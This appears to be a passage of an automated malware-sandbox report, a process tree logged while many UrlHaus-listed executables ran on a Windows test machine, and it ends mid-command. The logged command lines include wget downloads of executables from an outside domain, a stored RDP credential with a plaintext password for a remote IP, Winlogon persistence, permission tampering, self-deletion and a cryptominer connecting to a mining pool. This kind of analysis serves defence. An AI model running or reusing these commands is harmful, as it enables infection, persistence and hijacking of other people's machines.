                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1852 /prefetch:2
                                        6⤵
                                          PID:2484
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
                                          6⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4772
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
                                          6⤵
                                            PID:2332
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
                                            6⤵
                                            • Uses browser remote debugging
                                            PID:2960
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                            6⤵
                                            • Uses browser remote debugging
                                            PID:984
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:2
                                            6⤵
                                              PID:4936
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2372 /prefetch:2
                                              6⤵
                                                PID:1788
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2360 /prefetch:2
                                                6⤵
                                                  PID:804
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3980 /prefetch:2
                                                  6⤵
                                                    PID:3036
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4032 /prefetch:2
                                                    6⤵
                                                      PID:4788
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
                                                      6⤵
                                                      • Uses browser remote debugging
                                                      PID:4396
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
                                                      6⤵
                                                      • Uses browser remote debugging
                                                      PID:4900
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJJJDAAECGHD" & exit
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5952
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 10
                                                      6⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Delays execution with timeout.exe
                                                      PID:6008
                                                • C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:3056
                                                • C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3116
                                                • C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies Internet Explorer settings
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:1704
                                                • C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1208
                                                • C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:392
                                                • C:\Users\Admin\Downloads\UrlHausFiles\unik.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"
                                                  4⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4936
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1500
                                                    5⤵
                                                    • Program crash
                                                    PID:5268
                                                • C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"
                                                  4⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Drops startup file
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:864
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                    5⤵
                                                      PID:2292
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5736
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5388
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5588
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5816
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 568
                                                      5⤵
                                                      • Program crash
                                                      PID:6016
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\build.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\build.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4824
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\KFHJJJKKFHID" & exit
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3520
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 10
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:5124
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\shell.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5824
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6128
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      PID:2960
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 2.2.2.2 -n 1 -w 3000
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:5224
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3704
                                                    • C:\Windows\system32\cmd.exe
                                                      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D6B.tmp\6D6C.tmp\6D6D.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
                                                      5⤵
                                                        PID:2832
                                                        • C:\Windows\system32\cmdkey.exe
                                                          cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
                                                          6⤵
                                                            PID:4240
                                                          • C:\Windows\system32\mstsc.exe
                                                            mstsc /v: 211.168.94.177
                                                            6⤵
                                                            • Enumerates connected drives
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: AddClipboardFormatListener
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3192
                                                          • C:\Windows\system32\cmdkey.exe
                                                            cmdkey /delete: 211.168.94.177
                                                            6⤵
                                                              PID:5128
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout /t 1
                                                              6⤵
                                                              • Delays execution with timeout.exe
                                                              PID:4808
                                                        • C:\Users\Admin\Downloads\UrlHausFiles\boot.exe
                                                          "C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:5264
                                                          • C:\Windows\system32\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7153.tmp\7154.tmp\7155.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
                                                            5⤵
                                                              PID:5400
                                                              • C:\Windows\explorer.exe
                                                                explorer.exe
                                                                6⤵
                                                                • Modifies registry class
                                                                PID:3544
                                                              • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:5752
                                                              • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:3616
                                                              • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:3168
                                                              • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:2388
                                                              • C:\Users\Admin\AppData\Roaming\run.exe
                                                                run.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5924
                                                                • C:\Windows\system32\cmd.exe
                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D26E.tmp\D26F.tmp\D270.bat C:\Users\Admin\AppData\Roaming\run.exe"
                                                                  7⤵
                                                                    PID:5232
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c
                                                                      8⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:2372
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c
                                                                      8⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:5572
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      8⤵
                                                                        PID:4704
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"
                                                                        8⤵
                                                                        • Views/modifies file attributes
                                                                        PID:5680
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"
                                                                        8⤵
                                                                        • Views/modifies file attributes
                                                                        PID:2472
                                                                      • C:\Windows\system32\chcp.com
                                                                        chcp 65001
                                                                        8⤵
                                                                          PID:5852
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F
                                                                          8⤵
                                                                            PID:5488
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F
                                                                            8⤵
                                                                              PID:1452
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F
                                                                              8⤵
                                                                                PID:5728
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SchTasks /Delete /TN "Fix Getting Devices" /F
                                                                                8⤵
                                                                                  PID:5556
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SchTasks /Delete /TN "Windows Optimize" /F
                                                                                  8⤵
                                                                                    PID:340
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTasks /Delete /TN "ChangeWallpaper" /F
                                                                                    8⤵
                                                                                      PID:2356
                                                                                • C:\Users\Admin\AppData\Roaming\run2.exe
                                                                                  run2.exe
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6076
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D608.tmp\D609.tmp\D60A.bat C:\Users\Admin\AppData\Roaming\run2.exe"
                                                                                    7⤵
                                                                                    • Drops file in System32 directory
                                                                                    PID:5084
                                                                                    • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                                      wget -q "http://quanlyphongnet.com/net/wallx.exe" -O "wallx.exe"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5916
                                                                                    • C:\Users\Admin\AppData\Roaming\wallx.exe
                                                                                      wallx.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1092
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE62.tmp\EE63.tmp\EE64.bat C:\Users\Admin\AppData\Roaming\wallx.exe"
                                                                                        9⤵
                                                                                          PID:2668
                                                                                          • C:\Users\Admin\AppData\Roaming\WallpaperX.exe
                                                                                            WallpaperX.exe
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            • Sets desktop wallpaper using registry
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4708
                                                                                      • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                                        wget -q "http://quanlyphongnet.com/net/boot.exe" -O "boot.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:236
                                                                                      • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                                        wget -q "http://quanlyphongnet.com/net/FixCSM.exe" -O "FixCSM.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:564
                                                                                      • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                                        wget -q "http://quanlyphongnet.com/net/del.exe" -O "C:\Windows\System32\del.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in System32 directory
                                                                                        PID:5660
                                                                                      • C:\Users\Admin\AppData\Roaming\wget.exe
                                                                                        wget -q "http://quanlyphongnet.com/net/Coc Coc XG.exe" -O "Coc Coc XG.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4712
                                                                                      • C:\Windows\system32\takeown.exe
                                                                                        takeown /F "C:\windows\system32\userinit.exe"
                                                                                        8⤵
                                                                                        • Possible privilege escalation attempt
                                                                                        • Modifies file permissions
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:640
                                                                                      • C:\Windows\system32\icacls.exe
                                                                                        icacls "C:\windows\system32\userinit.exe" /grant administrators:F
                                                                                        8⤵
                                                                                        • Possible privilege escalation attempt
                                                                                        • Modifies file permissions
                                                                                        PID:4512
                                                                                      • C:\FixCSM.exe
                                                                                        C:\FixCSM.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5676
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4ABB.tmp\4ACC.tmp\4ACD.bat C:\FixCSM.exe"
                                                                                          9⤵
                                                                                            PID:5904
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\boot.exe,C:\Program Files (x86)\CSMClient\CyberStation.exe," /f
                                                                                              10⤵
                                                                                              • Modifies WinLogon for persistence
                                                                                              PID:2976
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          TIMEOUT /T 10
                                                                                          8⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5432
                                                                                        • C:\Windows\System32\del.exe
                                                                                          C:\Windows\System32\del.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6104
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F5A.tmp\6F5B.tmp\6F5C.bat C:\Windows\System32\del.exe"
                                                                                            9⤵
                                                                                              PID:5624
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                TIMEOUT /T 5
                                                                                                10⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5944
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +h "C:\Users\Administrator\AppData\Roaming\config.txt"
                                                                                            8⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:1880
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +h "C:\Users\Administrator\AppData\Roaming\log.txt"
                                                                                            8⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:2292
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:5780
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\me.exe
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\me.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:2332
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\..\360Downloads\Pester.bat
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5336
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping -n 4 127.0.0.1
                                                                                        6⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:1748
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5888
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\wow.exe
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2856
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1844
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5864
                                                                                  • C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
                                                                                    "C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:5496
                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\UrlHausFiles\urlhaus_urls.txt
                                                                                2⤵
                                                                                • Opens file in notepad (likely ransom note)
                                                                                PID:3544
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4184
                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5640
                                                                              • C:\Windows\system32\taskmgr.exe
                                                                                "C:\Windows\system32\taskmgr.exe" /0
                                                                                2⤵
                                                                                • Drops startup file
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:5392
                                                                              • C:\Users\Admin\Desktop\Coc Coc.exe
                                                                                "C:\Users\Admin\Desktop\Coc Coc.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:4440
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E45.tmp\4E46.tmp\4E47.bat "C:\Users\Admin\Desktop\Coc Coc.exe""
